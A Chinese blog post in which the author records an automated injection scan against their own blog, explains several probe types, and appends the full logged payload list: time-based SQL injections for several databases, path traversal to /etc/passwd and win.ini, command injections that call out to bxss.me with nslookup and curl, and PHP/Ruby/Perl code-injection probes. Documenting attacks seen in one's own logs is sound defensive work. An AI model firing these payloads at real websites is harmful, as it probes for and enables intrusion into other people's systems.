博客又又又被攻击了，这次是注入攻击，百度了下被注入的网站还挺多。。

博客被注入攻击的记录

一、讲讲

事实上开始没发现，今天没事儿瞅瞅博客才看见的，mysql里面的评论数据不太对劲，然后看了看一堆乱码，再仔细一看发现有XOR什么的，可能是sql注入攻击，挑了一个出来百度搜了一下真是注入攻击。。。

还好后端java的数据层用的是#{}而不是${}，不然可能就被成功注入了。

他是通过给每个请求的任意参数修改成注入的字符串，然后改一个请求一个（每改一个都会请求一次），所以一个请求参数越多请求的次数越多。

而且请求得异常频繁，从我被攻击的记录来看一秒钟会有三十次请求的频率。最终多达十一万多条记录。

下面会尽力分析一下，我会在最后放出统计的注入代码。

二、分析下

1. sql延时注入

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

分析：mysql延时语句，如果请求真的等了十五秒才返回，说明语句被执行了，证明网站有漏洞

-1" OR 2+265-265-1=0+0+0+1 -- 
-1 OR 2+192-192-1=0+0+0+1 -- 
-1 OR 2+152-152-1=0+0+0+1
-1' OR 2+349-349-1=0+0+0+1 -- 

分析：看起来很经典，就是让这个sql的where是true

2. linux的sh脚本 和 windows的shell脚本

/etc/shells
../../../../../../../../../../../../../../etc/shells
../../../../../../../../../../../../../../etc/passwd
(nslookup -q=cname hitxknfbuvcytb6fbe.bxss.me||curl hitxknfbuvcytb6fbe.bxss.me))

c:/windows/win.ini
../../../../../../../../../../../../../../windows/win.ini

分析：大致就是通过这个判断是否可以直接运行操作系统命令

3. http地址

Http://bxss.me/t/fit.txt

分析：可能是通过这个判断有没有外网访问？？？另外其中出现了很多次bxss.me域名，应该是黑客持有的域名

4. javascript脚本

Socket.gethostbyname('hitjj'+'iavjtlgsadee5.bxss.me.')[3].to_s)+'
'+response.write(9045529*9064400)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(86).concat(104).concat(76)+(require'socket'

分析：应该是通过js脚本注入去连接黑客的服务器，看不出来

5. 不知道

assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))
print(md5(31337));

分析：单独拎出来是发现上面那行base64解码后正好是print(md5(31337));，不知道为什么是这个值，可能会用返回值判断是否执行

二、记录下注入的字符串

fwC4EYe6
5JirZv7l
-1 OR 2+405-405-1=0+0+0+1 -- 
-1 OR 2+295-295-1=0+0+0+1
-1' OR 2+728-728-1=0+0+0+1 -- 
-1' OR 2+408-408-1=0+0+0+1 or '4kHIj9TJ'='
-1" OR 2+265-265-1=0+0+0+1 -- 
-1 OR 2+192-192-1=0+0+0+1 -- 
-1 OR 2+152-152-1=0+0+0+1
-1' OR 2+349-349-1=0+0+0+1 -- 
-1' OR 2+303-303-1=0+0+0+1 or 'mtCw6viM'='
-1" OR 2+768-768-1=0+0+0+1 -- 
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1 waitfor delay '0:0:15' -- 
5SOkP5Kv'; waitfor delay '0:0:15' -- 
61nop9yL'; waitfor delay '0:0:15' -- 
2aROwtzh' OR 737=(SELECT 737 FROM PG_SLEEP(15))--
Kw2oFy63' OR 821=(SELECT 821 FROM PG_SLEEP(15))--
zwHhvrlx') OR 443=(SELECT 443 FROM PG_SLEEP(15))--
rq7hD9Tg') OR 801=(SELECT 801 FROM PG_SLEEP(15))--
6clWyyhe')) OR 966=(SELECT 966 FROM PG_SLEEP(15))--
XcmAaVzf')) OR 969=(SELECT 969 FROM PG_SLEEP(15))--
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'"
'"%2527%2522\'\"
@@zCCrR
@@rdUn2
9QPgamGo
-1 OR 2+423-423-1=0+0+0+1 -- 
-1 OR 2+973-973-1=0+0+0+1
-1' OR 2+479-479-1=0+0+0+1 -- 
-1' OR 2+232-232-1=0+0+0+1 or 'U8LOQPLc'='
-1" OR 2+909-909-1=0+0+0+1 -- 
uKSjy32g'; waitfor delay '0:0:15' -- 
gq0rxPX1' OR 170=(SELECT 170 FROM PG_SLEEP(15))--
8OpoQPtx') OR 702=(SELECT 702 FROM PG_SLEEP(15))--
4OqyfDvr')) OR 222=(SELECT 222 FROM PG_SLEEP(15))--
@@9tlgW
5rlVqKWT
-1 OR 2+812-812-1=0+0+0+1 -- 
-1 OR 2+86-86-1=0+0+0+1
-1' OR 2+733-733-1=0+0+0+1 -- 
-1' OR 2+969-969-1=0+0+0+1 or 'IPZ80XU4'='
-1" OR 2+771-771-1=0+0+0+1 -- 
1uQhlNir
-1 OR 2+831-831-1=0+0+0+1 -- 
-1 OR 2+242-242-1=0+0+0+1
-1' OR 2+948-948-1=0+0+0+1 -- 
-1' OR 2+606-606-1=0+0+0+1 or '06rxK1Hg'='
-1" OR 2+715-715-1=0+0+0+1 -- 
LkXCLN9W'; waitfor delay '0:0:15' -- 
Q7qikNOp' OR 43=(SELECT 43 FROM PG_SLEEP(15))--
4ofH2iTX') OR 996=(SELECT 996 FROM PG_SLEEP(15))--
Yp6UTf13')) OR 909=(SELECT 909 FROM PG_SLEEP(15))--
@@TnwBO
r28l1zSQ'; waitfor delay '0:0:15' -- 
eY5wrHhS' OR 463=(SELECT 463 FROM PG_SLEEP(15))--
c8T2gMfk') OR 322=(SELECT 322 FROM PG_SLEEP(15))--
9G8OUeOT')) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
TWYECcam
@@Y57b3
-1 OR 2+955-955-1=0+0+0+1 -- 
-1 OR 2+454-454-1=0+0+0+1
-1' OR 2+434-434-1=0+0+0+1 -- 
xCiXJLfS
-1' OR 2+102-102-1=0+0+0+1 or 'Y7Jeh4oD'='
-1" OR 2+662-662-1=0+0+0+1 -- 
-1 OR 2+913-913-1=0+0+0+1 -- 
-1 OR 2+854-854-1=0+0+0+1
-1' OR 2+127-127-1=0+0+0+1 -- 
-1' OR 2+320-320-1=0+0+0+1 or 'm5tul3Ho'='
-1" OR 2+174-174-1=0+0+0+1 -- 
qymRhoN0'; waitfor delay '0:0:15' -- 
JEdrwrKo' OR 622=(SELECT 622 FROM PG_SLEEP(15))--
lSDr6V1G') OR 797=(SELECT 797 FROM PG_SLEEP(15))--
pojyfgpF'; waitfor delay '0:0:15' -- 
YoKWsRdn')) OR 175=(SELECT 175 FROM PG_SLEEP(15))--
m0bXtXEH' OR 768=(SELECT 768 FROM PG_SLEEP(15))--
MEfm0Drz') OR 544=(SELECT 544 FROM PG_SLEEP(15))--
@@5cOsd
VQUsMg6y')) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
@@NWiCn
"+"A".concat(70-3).concat(22*4).concat(121).concat(85).concat(115).concat(67)+(require"socket"
Socket.gethostbyname("hitst"+"srmbbhbec67c1.bxss.me.")[3].to_s)+"
response.write(9045529*9064400)
'+'A'.concat(70-3).concat(22*4).concat(122).concat(89).concat(103).concat(87)+(require'socket'
Socket.gethostbyname('hitjj'+'iavjtlgsadee5.bxss.me.')[3].to_s)+'
'+response.write(9045529*9064400)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(86).concat(104).concat(76)+(require'socket'
Socket.gethostbyname('hityf'+'koealnvt5e322.bxss.me.')[3].to_s)
"+response.write(9045529*9064400)+"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
!(()&&!|*|*|
";print(md5(31337));$a="
^(#$!@#$)(()))******
../../../../../../../../../../../../../../etc/passwd
${@print(md5(31337))}
../../../../../../../../../../../../../../windows/win.ini
${@print(md5(31337))}\
'.print(md5(31337)).'
file:///etc/passwd
../
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
'.gethostbyname(lc('hitwk'.'wvognwak94d12.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(74).chr(106).chr(70).'
".gethostbyname(lc("hitun"."ddbipcxn1bcfe.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(70).chr(121).chr(85)."
gethostbyname(lc('hitjg'.'magphqcaba2c9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(86).chr(97).chr(65)
'"()
'&&sleep(27*1000)*zwvrii&&'
echo yqvnpa$()\ dzwtva\nz^xyu||a #' &echo yqvnpa$()\ dzwtva\nz^xyu||a #|" &echo yqvnpa$()\ dzwtva\nz^xyu||a #
"&&sleep(27*1000)*ncsdvq&&"
&echo qbumwv$()\ xjyxzj\nz^xyu||a #' &echo qbumwv$()\ xjyxzj\nz^xyu||a #|" &echo qbumwv$()\ xjyxzj\nz^xyu||a #
'||sleep(27*1000)*gvzkot||'
|echo abopqv$()\ rytabv\nz^xyu||a #' |echo abopqv$()\ rytabv\nz^xyu||a #|" |echo abopqv$()\ rytabv\nz^xyu||a #"||sleep(27*1000)*ghayjm||"
(nslookup -q=cname hitxknfbuvcytb6fbe.bxss.me||curl hitxknfbuvcytb6fbe.bxss.me))
$(nslookup -q=cname hiticgobfcbwa7b0fb.bxss.me||curl hiticgobfcbwa7b0fb.bxss.me)
&nslookup -q=cname hituxlafypvktf9373.bxss.me&'\"`0&nslookup -q=cname hituxlafypvktf9373.bxss.me&`'
&(nslookup -q=cname hituyqrvzfsmw3f676.bxss.me||curl hituyqrvzfsmw3f676.bxss.me)&'\"`0&(nslookup -q=cname hituyqrvzfsmw3f676.bxss.me||curl hituyqrvzfsmw3f676.bxss.me)&`'
|(nslookup -q=cname hitficmsiwtqkcb2ba.bxss.me||curl hitficmsiwtqkcb2ba.bxss.me)
`(nslookup -q=cname hithlczbamznk5469f.bxss.me||curl hithlczbamznk5469f.bxss.me)`
;(nslookup -q=cname hitvjmulqyoez231f0.bxss.me||curl hitvjmulqyoez231f0.bxss.me)|(nslookup -q=cname hitvjmulqyoez231f0.bxss.me||curl hitvjmulqyoez231f0.bxss.me)&(nslookup -q=cname hitvjmulqyoez231f0.bxss.me||curl hitvjmulqyoez231f0.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjlrljaqmled4929.bxss.me||curl${IFS}hitjlrljaqmled4929.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hiteqnzfohsxpbb0d1.bxss.me||curl${IFS}hiteqnzfohsxpbb0d1.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hiteqnzfohsxpbb0d1.bxss.me||curl${IFS}hiteqnzfohsxpbb0d1.bxss.me)&`'
eNixC1e6j
-1 OR 2+580-580-1=0+0+0+1 -- 
-1 OR 2+76-76-1=0+0+0+1
-1' OR 2+292-292-1=0+0+0+1 -- 
-1' OR 2+206-206-1=0+0+0+1 or 'KufDtOlt'='
-1" OR 2+854-854-1=0+0+0+1 -- 
mLDGf1yO'; waitfor delay '0:0:15' -- 
8EbTtZPt' OR 120=(SELECT 120 FROM PG_SLEEP(15))--
AtVXmDaq') OR 216=(SELECT 216 FROM PG_SLEEP(15))--
6ZffQC7J')) OR 977=(SELECT 977 FROM PG_SLEEP(15))--
@@YpBY7

此为博主副博客，留言请去主博客，转载请注明出处：https://www.baby7blog.com/myBlog/135.html